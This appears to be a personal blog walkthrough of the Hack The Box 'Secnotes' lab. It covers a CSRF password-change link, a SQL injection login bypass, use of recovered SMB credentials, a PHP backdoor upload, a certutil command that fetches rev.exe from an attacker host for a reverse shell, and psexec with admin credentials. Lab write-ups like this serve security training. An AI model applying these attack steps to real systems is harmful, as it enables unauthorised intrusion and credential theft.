NitheshD05 | Cyber Realm

Search

SearchSearch

Secnotes

Apr 16, 20263 min read

HTB Profile Image

Ping

Nmap Scans

mapit 10.10.10.97

Nmap Default Scan

Nmap Service and Script Scan

Nmap All port Scan

Nmap Service and Script Scan for new port

On Port 80 tried with default admin passwords, but it say’s the is no account name admin

So registered new user test with password test@1234 and logged in

No smb Session

Gobuster Scan

gobuster dir -u http://10.10.10.97 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,aspx -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt

Nothing Intresting

Something Intresting in the contact us area Tyler is clicking whatever link we send to him

So will trick him to change password, by sending malicious link For that we need to capture the request response of the change password functionality

Will send him this corrupted link, I have added my address, just to make sure is he click the link accordingly.

http://10.10.10.97/change_pass.php?password=rosh@3000&confirm_password=rosh@3000&submit=submit
http://10.10.14.3:8080

I think he clicked the link accordingly, now will check the password has been changed or not

But it didn’t work, I don’t Know the reason, Though I have checked walkthroughs and official writeup, for some unknown reason, it didn’t work for me. But I found other way to exploit this from this link: https://www.hackingarticles.in/hack-the-box-secnotes-walkthrough/

Will use this ’ or 1=‘1 to create the account and logged in with the same ’ or 1=‘1:’ or 1=‘1 Can get into tyler’s account

Will analyse the notes Found tyler’s password 92g!mA8BGjOirkL%OG&*

We can only try this password in one place, it is smb

smbclient -U 'tyler' -L //10.10.10.97

Now we can list the shares, will analyze the new-site

SMB session

smbclient \\\\10.10.10.97\\new-site\\ -U tyler

Surly it should the IIS service on port 8808 will put a cmdasp.aspx to ger RCE It doesn’t work, tried with bot .aspx and asp

Will try with simple-backdoor.php

Will Jump to Initial Foothold…!

Now will get Reverse Shell

ertutil -urlcache -f http://10.10.14.3/rev.exe rev.exe

Will trigger that

Will trigger that

C:\inetpub\new-site\rev.exe

I have already started my netcat listener Got shell

User.txt

Found some files

Get-ChildItem -Path C:\Users -Include *.txt, *.log, *.kdbx, *.conf, *.ini, *.exe, *.ps1 -File -Recurse -ErrorAction SilentlyContinue

Will check our Privilege

whoami /priv

Will analyse this bash.lnk

Nothing works for me in this lab, so found admin’s password and got session via psexec

psexec.py "administrator:u6\!4ZwgwOM#^OBf#Nwnh"@10.10.10.97 cmd.exe

Root.txt

Not yet…!

Backlinks

Graph View